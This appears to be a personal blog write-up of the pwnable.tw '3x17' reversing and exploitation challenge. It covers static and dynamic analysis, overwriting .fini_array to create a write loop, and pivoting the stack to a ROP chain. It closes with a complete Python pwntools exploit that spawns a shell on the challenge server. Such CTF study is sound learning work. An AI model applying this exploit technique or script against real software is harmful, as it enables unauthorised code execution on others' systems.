Introduction
Last reversing CTF was so much fun, I started directly with the next challenge. For me, it was a very hard one and it took me several weeks (although I recognized, after reading other peoples solutions my approach was far too complex ;). Nevertheless, it is still interesting and I want to describe the details in this blog article.
The task in general: You get the url of a service, the corresponding binary “3×17” for download and your mission is to spawn a shell.
Static Analysis
Lets take a look at the binary and its import table:
belial@anubis:~/Dropbox/pwnable.tw/4$ objdump -T 3x17
3x17: file format elf64-x86-64
objdump: 3x17: not a dynamic object
DYNAMIC SYMBOL TABLE:
no symbols
It is statically linked and does not import any external functionality. This leads to a size of 700kb and lots of potential ROP gadgets :).
Next stop: Its security features.
$ checksec 3x17
[*] '/home/belial/3x17'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Checksec claims there is no canary. Stack isn’t executable and protected by ASLR.
Best guess: We have to find the stack address and overwrite it with a set of ROP gadgets to spawn a shell.
Behaviour
When you run the binary, you get something like this:
belial@anubis:~/Dropbox/pwnable.tw/4$ ./3x17
addr:123
data:456
belial@anubis:~/Dropbox/pwnable.tw/4$ 456
It asks for an address and for data. Presumably, we can use it to alter memory locations and dont have to look for a write exploit ourselves. Unfortunatly something is wrong, the data input is rejected and redirected to our shell. Therefore, we start Ghidra to check the binaries parsing functionality and to learn how to handle it correctly.
Input Parser
Both strings “addr:” and “data:” are hardcoded into the binaries data segment and have only one reference. This leads us to the following function:
ulong FUN_00401b6d(void) { int iVar1; ulong uVar2; long in_FS_OFFSET; undefined local_28 [24]; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); DAT_004b9330 = DAT_004b9330 + 1; uVar2 = (ulong)DAT_004b9330; if (DAT_004b9330 == 1) { FUN_00446ec0(1,"addr:",5); FUN_00446e20(0,local_28,0x18); iVar1 = FUN_0040ee70(local_28); FUN_00446ec0(1,"data:",5); FUN_00446e20(0,(long)iVar1,0x18); uVar2 = 0; } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ FUN_0044a3e0(); } return uVar2; }
Obvisiously, it contains a stack protection which terminates the program upon return address manipulation. So, our initial “checksec” command was wrong. Furthermore, the function has a counter and the main body is only executed if it equals to one. Luckily, it is based on a byte which would overflow quite fast ;). Besides this:
- FUN_00446ec0() writes “addr:” on screen.
- FUN_00446e20() reads 24 bytes into a buffer.
- FUN_0040ee70() parses the result and stores it in eax.
- FUN_00446ec0() writes “data:” on screen.
- FUN_00446e20() reads 24 bytes and stores them at the previously parsed address.
Unfortunatly, buffer size, read() and write() length are hardcoded. We can not exploit much here. Therefore, we take a look at FUN_0040ee70(). Maybe it is possible to leak a stack address somehow.
Besides the usual function prolog, several registers are initialized with static values which are not altered but still used for branching. A good example is rdx:
mov edx, 0Ah
;...
cmp edx, 1
jz loc_40FEE8
cmp edx, 24h
ja loc_40FEE8
This code would jump to loc_40FEE8 if rdx is not between 1h and 24h. Because of the registers static nature, this will never happen but makes reading more difficult. Therefore, we use IDA and its debugger to see directly which branch is taken.
The function starts with the following lookup table access:
test byte ptr [rcx+rax*2+1], 20h
jz short loc_40FD92
loc_40FD80:
add rbx, 1
movsx rax, byte ptr [rbx]
mov rsi, rax
test byte ptr [rcx+rax*2+1], 20h
jnz short loc_40FD80
loc_40FD92:
;...
Rcx contains a pointer to a lookup table. Rax is the first character and Rbx a pointer to the input string. Taking a closer look at the lookup table leads to the following conclusion: This code skips the first bytes if they are equal to carriage return, new line, etc. Not very difficult to understand but hard to read when you take a look at the disassembly for the first time.
Afterwards, the algorithm checks whether the input string starts with a “+” or a “-“. It seems, unary operators are supported for the specified memory address. Next, garbage code performs branches on static variables. Finally, the following opcodes are executed:
loc_40FE49:
lea edi, [rsi-30h]
cmp dil, 9
jbe short loc_40FE6E
loc_40FE6E:
movzx esi, dil
cmp esi, edx
jge short loc_40FE98
;...
Rsi contains the current input character, Rdx equals to 0ah. It checks whether it is a digit between 30h and 39h. If it is not a digit, lookup tables are used to check whether it is a letter, upper case is transformed into lower case, etc. but in the end the function terminates. If it is a digit, the following code is executed:
loc_40FE29:
imul rax, r15
movzx edi, dil
mov rsi, r8
add rax, rdi
Rax contains the function return value and is initialized with 0x00. Dil is the current character-30h. R15 holds 0ah. The algorithm multiplicates the previously parsed value with 10 and adds the last character. This repeats until the input string ends with a 0x00.
Fini_array Section
The current situation: We can enter a decimal value. It is translated into an address and 24 bytes are written to it. The parsing algorithm seems secure. It rejects everything which is not a digit (although in a complicated way with garbage code, lookup tables, allows unary operators, etc.). So we face three problems here:
- Wrinting 24 bytes to an address of our choice is not enough for a ROP chain.
- 24 bytes would be enough for a shell code but no executable section is writable.
- We write into a static buffer and can not exploit the parser to give us the stack address.
At this point, I was rather stuck. I debugged the whole binary to find other exploitable parts but without success. The only interesting aspect: Before termination, the application loaded function pointers from the data segment and called them. A friend gave me an important hint: Check the binaries section and read about “fini_array”.
readelf -S 3x17
There are 29 section headers, starting at offset 0xb94e8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
...
[16] .fini_array FINI_ARRAY 00000000004b40f0 000b30f0
0000000000000010 0000000000000008 WA 0 0 8
[17] .data.rel.ro PROGBITS 00000000004b4100 000b3100
0000000000002df4 0000000000000000 WA 0 0 32
This special section contains a list of function pointers which are called upon termination to clean things up. As you can see, the section is writable and includes two pointers with a total size of 16 bytes. We overwrite them the following way:
- First Pointer becomes FUN_00401b6d() which reads again user input and writes to memory.
- Second pointer gets the .fini_array callee loop code.
At this point the whole application runs in an infinite loop and gives us an important advantage: We can write a multiple of 24 bytes. Next open tasks:
- Write a ROP chain into memory.
- Change stack address to the rop chain and trigger a return statement.
A ROP chain is trivial. The tool ROPGadget finds a set of opcodes and their addresses in memory which can be used to invoke exec() for “/bin/sh”. Behind .fini_array is a huge chunk of .data_rel.ro. It is writable as well and we use it to store our ROP chain addresses. Finally, we have to change Esp to execute the gadgets. Therefore, let’s take a look at the code which executes the .fini_array function pointers:
sub_402960 proc near
;...
lea rbp, off_4B40F0
mov rbx,1
;...
loc_402988:
call qword ptr [rbp+rbx*8+0]
sub rbx, 1
cmp rbx, 0FFFFFFFFFFFFFFFFh
jnz short loc_402988
;...
ret
Obvisiously, Rbp contains the base address of .fini_array. Rbx is used as an index for the function pointers. It is initialized with 1 and decremented by each iteration. Luckily, 3×17 contains the following ROP gadget:
0x00000000004715ec : mov bl, 0x48 ; mov eax, edx ; ret
If we write 0x4715ec into the fini_array, Ebx will contain 0x48. The operation enlarges the fini_array to a total size of 71 pointers which start at address 0x4b4328. This gives us plenty of space for ROP gadgets which can be executed for the final task: Set a new Esp. To do so, the following two gadgets are neccessary:
0x000000000048a578 : mov rax, qword ptr [rsi + 8] ; ret
0x000000000044f62b : xchg eax, esp ; ret
Basically, these opcodes copy [rsi+8] into Rax and assign Eax to Esp. Luckily, when the fini_array loop starts, esi points to 0x004b40f8 which is the end of the fini_array section. Therefore, rsi+8 corresponds to the first bytes of the following .data.rel.ro section. As we previously mentioned, this section is writable and already contains the ROP chain which starts the shell. We write the address of the ROP chain to the beginning of the section, set the new Esp and a shell pops up :).
Conclusion
As mentioned in the introduction, this exploit is maybe a little bit too complicated. Nevertheless, it works ;). So lets summarize:
- Start an infinite loop to break the 24 byte write limitation.
- Write the ROP chain to .data.rel.ro+8
- Write the ROP chain start address to .data.rel.ro.
- Write stack change ROP gadgets to 0x004b4328.
- Increase Ebx, trigger the stack change code and start the shell.
This is the corresponding Python exploit:
#!/usr/bin/python3 # coding: utf-8 def convert_address(addr): return bytes(str(addr).encode('ascii')) def write_24_bytes(addr, payload): conn.recv(5) conn.sendline(addr) conn.recv(5) conn.send(payload) def main(): # create infinite main() loop infinite_loop_payload = p64(0x402960) + p64(0x401b6d) + p64(0x0) write_24_bytes(convert_address(0x4B40F0), infinite_loop_payload) # ----------------------------------------------- # write rop chain on new stack address 0x4b4108 which spawns a shell shell_payload_0 = p64(0x406c30) + p64(0x4b70e0) + p64(0x41e4af) write_24_bytes(convert_address(0x4B4108), shell_payload_0) shell_payload_1 = bytes('/bin//sh'.encode('ascii'))\ + p64(0x47c1b1) + p64(0x406c30) write_24_bytes(convert_address(0x4B4120), shell_payload_1) shell_payload_2 = p64(0x4b70e8) + p64(0x442110) + p64(0x47c1b1) write_24_bytes(convert_address(0x4B4138), shell_payload_2) shell_payload_3 = p64(0x401696) + p64(0x4b70e0) + p64(0x406c30) write_24_bytes(convert_address(0x4B4150), shell_payload_3) shell_payload_4 = p64(0x4b70e8) + p64(0x446e35) + p64(0x4b70e8) write_24_bytes(convert_address(0x4B4168), shell_payload_4) shell_payload_5 = p64(0x420a80) + p64(0x471821) + p64(0x471821) write_24_bytes(convert_address(0x4B4180), shell_payload_5) # rax == 0x1c == 28, we need rax== 0x3b == 59, so we have to add 31 #eax+=3 shell_payload_6 = p64(0x471821) + p64(0x471821) + p64(0x471821) write_24_bytes(convert_address(0x4B4198), shell_payload_6) write_24_bytes(convert_address(0x4B41B0), shell_payload_6) write_24_bytes(convert_address(0x4B41C8), shell_payload_6) shell_payload_7 = p64(0x471821) + p64(0x471810) + p64(0x4022b4) write_24_bytes(convert_address(0x4B41E0), shell_payload_7) # ----------------------------------------------- # write rop which change esp to 0x4b4108 stack_setter_payload = p64(0x44f62b) + p64(0x48a578) + p64(0x0) write_24_bytes(convert_address(0x4B4320), stack_setter_payload) # write address for ebx increase # which finally triggers esp changer code ebx_inc_payload = p64(0x4715ec) + p64(0x4b4108) + p64(0x406c30) write_24_bytes(convert_address(0x4B40F8), ebx_inc_payload) from pwn import * #context.log_level = 'DEBUG' conn = remote('chall.pwnable.tw',10105) print("Overwriting finit array with ROP chain...") main() print("Done, Shell should pop up :)") conn.interactive()